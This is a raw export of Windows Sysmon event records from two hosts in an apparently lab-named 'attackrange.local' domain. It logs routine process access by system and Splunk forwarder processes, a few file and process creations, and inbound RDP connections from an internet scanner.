14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050192Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050191Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050190Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050189Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050188Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050187Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050186Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBBC-607E-E806-00000000BB01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050185Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBBC-607E-E806-00000000BB01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050184Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.161{85C0FFC9-EBBC-607E-E806-00000000BB01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBD-607E-AA0B-00000000BB01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBBD-607E-AA0B-00000000BB01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.874{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBD-607E-AA0B-00000000BB01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.875{A7A01FEF-EBBD-607E-AA0B-00000000BB01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000073365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.458{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58562-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.146{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57528-false10.0.1.12-8000- 354300x800000000000000073363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.924{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com53407-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.640{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6388AD600B1F75B27BEE2F1841B5E4E3,SHA256=AF5C61820D332C75F14A070546C727012EE3225CF1C65A337E6EDEE7A22D485B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.484{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.359{A7A01FEF-EBBD-607E-A90B-00000000BB01}70206556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBD-607E-A90B-00000000BB01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:01.202{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBBD-607E-A90B-00000000BB01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 